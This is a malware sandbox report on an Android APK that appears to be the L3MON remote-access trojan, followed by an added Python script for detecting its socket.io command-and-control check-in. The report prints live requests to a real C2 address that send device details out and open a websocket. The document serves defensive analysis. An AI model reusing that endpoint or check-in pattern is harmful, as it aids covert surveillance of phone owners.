Analysis

  • max time kernel
    7s
  • max time network
    156s
  • platform
    android_x64
  • resource
    android-x64-20240624-en
  • resource tags
    android, arch:x64, arch:x86, image:android-x64-20240624-en, locale:en-us, os:android-10-x64, system
  • submitted
    2024-12-07 02:06 UTC

General

  • Target

    057689e28c35811575811beaa1fa07bdc0130188f4590d286a564a0236060048.apk

  • Size

    267KB

  • MD5

    5d75e747ee6c22e97bb8b6583c613c89

  • SHA1

    e6dd14937e631b86fa9cf52e46c5b875a772a5ee

  • SHA256

    057689e28c35811575811beaa1fa07bdc0130188f4590d286a564a0236060048

  • SHA512

    00c5dff37a9a550d6149caa5e11cf89fee4970e16e8363d133f25f1b1f99443ffc54e36e8485dd93ef48481328efb35963112896f5d98400bd02b35e77573d66

  • SSDEEP

    6144:VAqOHJbQC/0BbaRWSoTlA87mhYrIZFjllLGvNv90ku:VAfJc4NUA8TI3llLo9A

Malware Config

Signatures

Processes

  • com.etechd.l3mon (PID 4959)
    • Removes its main activity from the application launcher
    • Obtains sensitive information copied to the device clipboard

Network

  • Country: SE
    GET
    http://51.20.2.165:3001/socket.io/?model=Pixel%202&EIO=3&id=fbd4915e654343f2&transport=polling&release=10&manf=Google
    Remote address:
    51.20.2.165:3001
    Request
    GET /socket.io/?model=Pixel%202&EIO=3&id=fbd4915e654343f2&transport=polling&release=10&manf=Google HTTP/1.1
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)
    Host: 51.20.2.165:3001
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Content-Type: text/plain; charset=UTF-8
    Content-Length: 103
    Access-Control-Allow-Origin: *
    Set-Cookie: io=nvZt1PWuLWyzgPxbAAMX; Path=/; HttpOnly
    Date: Sat, 07 Dec 2024 02:06:42 GMT
    Connection: keep-alive
    Keep-Alive: timeout=5
  • Country: SE
    GET
    http://51.20.2.165:3001/socket.io/?release=10&model=Pixel%202&EIO=3&id=fbd4915e654343f2&transport=polling&manf=Google&sid=nvZt1PWuLWyzgPxbAAMX
    Remote address:
    51.20.2.165:3001
    Request
    GET /socket.io/?release=10&model=Pixel%202&EIO=3&id=fbd4915e654343f2&transport=polling&manf=Google&sid=nvZt1PWuLWyzgPxbAAMX HTTP/1.1
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)
    Host: 51.20.2.165:3001
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Content-Type: text/plain; charset=UTF-8
    Content-Length: 16
    Access-Control-Allow-Origin: *
    Set-Cookie: io=nvZt1PWuLWyzgPxbAAMX; Path=/; HttpOnly
    Date: Sat, 07 Dec 2024 02:06:42 GMT
    Connection: keep-alive
    Keep-Alive: timeout=5
  • Country: SE
    GET
    http://51.20.2.165:3001/socket.io/?release=10&model=Pixel%202&EIO=3&id=fbd4915e654343f2&transport=polling&manf=Google&sid=nvZt1PWuLWyzgPxbAAMX
    Remote address:
    51.20.2.165:3001
    Request
    GET /socket.io/?release=10&model=Pixel%202&EIO=3&id=fbd4915e654343f2&transport=polling&manf=Google&sid=nvZt1PWuLWyzgPxbAAMX HTTP/1.1
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)
    Host: 51.20.2.165:3001
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Content-Type: text/plain; charset=UTF-8
    Content-Length: 3
    Access-Control-Allow-Origin: *
    Set-Cookie: io=nvZt1PWuLWyzgPxbAAMX; Path=/; HttpOnly
    Date: Sat, 07 Dec 2024 02:06:43 GMT
    Connection: keep-alive
    Keep-Alive: timeout=5
  • Country: SE
    GET
    http://51.20.2.165:3001/socket.io/?release=10&model=Pixel%202&EIO=3&id=fbd4915e654343f2&transport=websocket&manf=Google&sid=nvZt1PWuLWyzgPxbAAMX
    Remote address:
    51.20.2.165:3001
    Request
    GET /socket.io/?release=10&model=Pixel%202&EIO=3&id=fbd4915e654343f2&transport=websocket&manf=Google&sid=nvZt1PWuLWyzgPxbAAMX HTTP/1.1
    Upgrade: websocket
    Connection: Upgrade
    Sec-WebSocket-Key: JSVmu+pHHnngbH93ugf6YA==
    Sec-WebSocket-Version: 13
    Host: 51.20.2.165:3001
    Accept-Encoding: gzip
    User-Agent: okhttp/3.5.0
    Response
    HTTP/1.1 101 Switching Protocols
    Upgrade: websocket
    Connection: Upgrade
    Sec-WebSocket-Accept: gMZ8VTOZEQGh3AzuRQyMQuqUxKg=
  • Country: US
    DNS
    ssl.google-analytics.com
    Remote address:
    1.1.1.1:53
    Request
    ssl.google-analytics.com
    IN A
    Response
    ssl.google-analytics.com
    IN A
    172.217.169.40
  • Country: US
    DNS
    android.apis.google.com
    Remote address:
    1.1.1.1:53
    Request
    android.apis.google.com
    IN A
    Response
    android.apis.google.com
    IN CNAME
    clients.l.google.com
    clients.l.google.com
    IN A
    142.250.178.14
  • 51.20.2.165:3001
    http://51.20.2.165:3001/socket.io/?release=10&model=Pixel%202&EIO=3&id=fbd4915e654343f2&transport=polling&manf=Google&sid=nvZt1PWuLWyzgPxbAAMX
    protocol: http; sent 1.3kB (9 packets), received 1.2kB (7 packets)
    HTTP Request / Response
      GET http://51.20.2.165:3001/socket.io/?model=Pixel%202&EIO=3&id=fbd4915e654343f2&transport=polling&release=10&manf=Google -> 200
      GET http://51.20.2.165:3001/socket.io/?release=10&model=Pixel%202&EIO=3&id=fbd4915e654343f2&transport=polling&manf=Google&sid=nvZt1PWuLWyzgPxbAAMX -> 200
      GET http://51.20.2.165:3001/socket.io/?release=10&model=Pixel%202&EIO=3&id=fbd4915e654343f2&transport=polling&manf=Google&sid=nvZt1PWuLWyzgPxbAAMX -> 200
  • 51.20.2.165:3001
    http://51.20.2.165:3001/socket.io/?release=10&model=Pixel%202&EIO=3&id=fbd4915e654343f2&transport=websocket&manf=Google&sid=nvZt1PWuLWyzgPxbAAMX
    protocol: http; sent 1.3kB (17 packets), received 732 B (11 packets)
    HTTP Request / Response
      GET http://51.20.2.165:3001/socket.io/?release=10&model=Pixel%202&EIO=3&id=fbd4915e654343f2&transport=websocket&manf=Google&sid=nvZt1PWuLWyzgPxbAAMX -> 101
  • 172.217.169.40:443
    ssl.google-analytics.com
    protocol: tls; sent 1.3kB (8 packets), received 6.3kB (9 packets)
  • 142.250.179.238:443
    protocol: tls, https; sent 857 B (1 packet), received 40 B (1 packet)
  • 142.250.178.14:443
    android.apis.google.com
    protocol: tls; sent 4.7kB (15 packets), received 8.8kB (23 packets)
  • 142.250.179.228:443
    protocol: tls, https; sent 429 B (2 packets), received 40 B (1 packet)
  • 142.250.179.228:443
    www.google.com
    protocol: tls; sent 8.5kB (28 packets), received 9.7kB (36 packets)
  • 224.0.0.251:5353
    sent 3.7kB (11 packets); received: (none)
  • 1.1.1.1:53
    ssl.google-analytics.com
    protocol: dns; sent 70 B (1 packet), received 86 B (1 packet)
    DNS Request ssl.google-analytics.com -> Response 172.217.169.40
  • 1.1.1.1:53
    android.apis.google.com
    protocol: dns; sent 69 B (1 packet), received 109 B (1 packet)
    DNS Request android.apis.google.com -> Response 142.250.178.14
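The only non-Google traffic in this run is the four-request socket.io exchange with 51.20.2.165:3001: an Engine.IO v3 (EIO=3) polling handshake that hands the server the device's model, manufacturer, Android release and a client id in the query string, receives a session id (sid) in the io cookie, and then upgrades to a persistent websocket under a second User-Agent (okhttp instead of Dalvik). The package name com.etechd.l3mon and this check-in shape are consistent with the open-source L3MON Android RAT client. The script below is an added example, not part of the tria.ge report or of the sample: it folds the request lines copied from the report into one per-server summary, recomputes the RFC 6455 Sec-WebSocket-Accept for the captured key so you can confirm the 101 really completed the upgrade, and applies a scoring heuristic that is my own assumption, not a vendor signature.

```python
# Added example (not from the tria.ge report or the sample's author): pull the
# socket.io EIO=3 check-in indicators out of captured HTTP request lines.
# SAMPLE_REQUESTS is constructed from the four requests to 51.20.2.165:3001 in the
# report; the scoring in verdict() is my own heuristic, not a vendor signature.
import base64
import hashlib
import ipaddress
from urllib.parse import parse_qs, urlsplit

DALVIK_UA = "Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)"
SAMPLE_REQUESTS = [
    ("GET /socket.io/?model=Pixel%202&EIO=3&id=fbd4915e654343f2&transport=polling&release=10&manf=Google HTTP/1.1",
     {"Host": "51.20.2.165:3001", "User-Agent": DALVIK_UA}),
    ("GET /socket.io/?release=10&model=Pixel%202&EIO=3&id=fbd4915e654343f2&transport=polling&manf=Google&sid=nvZt1PWuLWyzgPxbAAMX HTTP/1.1",
     {"Host": "51.20.2.165:3001", "User-Agent": DALVIK_UA}),
    ("GET /socket.io/?release=10&model=Pixel%202&EIO=3&id=fbd4915e654343f2&transport=polling&manf=Google&sid=nvZt1PWuLWyzgPxbAAMX HTTP/1.1",
     {"Host": "51.20.2.165:3001", "User-Agent": DALVIK_UA}),
    ("GET /socket.io/?release=10&model=Pixel%202&EIO=3&id=fbd4915e654343f2&transport=websocket&manf=Google&sid=nvZt1PWuLWyzgPxbAAMX HTTP/1.1",
     {"Host": "51.20.2.165:3001", "Upgrade": "websocket",
      "Sec-WebSocket-Key": "JSVmu+pHHnngbH93ugf6YA==", "User-Agent": "okhttp/3.5.0"}),
]

DEVICE_FIELDS = ("id", "model", "manf", "release")   # fingerprint keys leaked in the query
WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"       # RFC 6455 magic string


def parse_request_line(line):
    """Split 'GET /path?query HTTP/1.1' into (method, path, {param: first value})."""
    method, target, _version = line.split(" ", 2)
    parts = urlsplit(target)
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return method, parts.path, query


def is_socketio_handshake(path, query):
    """Engine.IO v3 handshake: /socket.io/ path, EIO=3 and an explicit transport."""
    return path.startswith("/socket.io/") and query.get("EIO") == "3" and "transport" in query


def host_is_bare_ip(host):
    """True when the Host header carries a literal IP (with or without port), not a name."""
    hostname = urlsplit("//" + host).hostname or ""
    try:
        ipaddress.ip_address(hostname)
        return True
    except ValueError:
        return False


def websocket_accept(key):
    """RFC 6455 Sec-WebSocket-Accept = base64(sha1(key + GUID)); compare it with the
    value in the 101 response to confirm the upgrade the client asked for completed."""
    digest = hashlib.sha1((key + WS_GUID).encode("ascii")).digest()
    return base64.b64encode(digest).decode("ascii")


def analyse(requests):
    """Fold the request sequence into one summary per (Host, client id)."""
    summary = {}
    for line, headers in requests:
        _method, path, query = parse_request_line(line)
        if not is_socketio_handshake(path, query):
            continue
        host = headers.get("Host", "")
        entry = summary.setdefault((host, query.get("id")), {
            "host": host, "bare_ip_host": host_is_bare_ip(host),
            "fingerprint": {k: query[k] for k in DEVICE_FIELDS if k in query},
            "polling_requests": 0, "sids": set(), "websocket_upgrade": False,
            "user_agents": set(), "expected_accept": None,
        })
        entry["user_agents"].add(headers.get("User-Agent", ""))
        if "sid" in query:
            entry["sids"].add(query["sid"])
        if query["transport"] == "polling":
            entry["polling_requests"] += 1
        elif query["transport"] == "websocket" and headers.get("Upgrade", "").lower() == "websocket":
            entry["websocket_upgrade"] = True
            if "Sec-WebSocket-Key" in headers:
                entry["expected_accept"] = websocket_accept(headers["Sec-WebSocket-Key"])
    return list(summary.values())


def verdict(entry):
    """Heuristic (my assumption): a bare-IP socket.io server that is handed a device
    fingerprint and then holds a websocket open looks like a RAT check-in, not a
    web app talking to its own backend. Two User-Agents on one session is the
    polling-then-okhttp-upgrade pattern seen above."""
    score = 2 * entry["bare_ip_host"] + 2 * (len(entry["fingerprint"]) >= 3)
    score += entry["websocket_upgrade"] + (len(entry["user_agents"]) > 1)
    return "likely-c2-checkin" if score >= 5 else "review"


if __name__ == "__main__":
    for e in analyse(SAMPLE_REQUESTS):
        print(verdict(e), e["host"], e["fingerprint"], "expect accept:", e["expected_accept"])
```

If the capture is intact, websocket_accept("JSVmu+pHHnngbH93ugf6YA==") should equal the Sec-WebSocket-Accept in the 101 response above; a mismatch means the upgrade was spoofed or the bytes were altered in transit. The host check is deliberately narrow: a legitimate backend almost always has a hostname and a TLS endpoint, whereas this sample talks plain HTTP to a literal IP on port 3001.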

MITRE ATT&CK Mobile v15
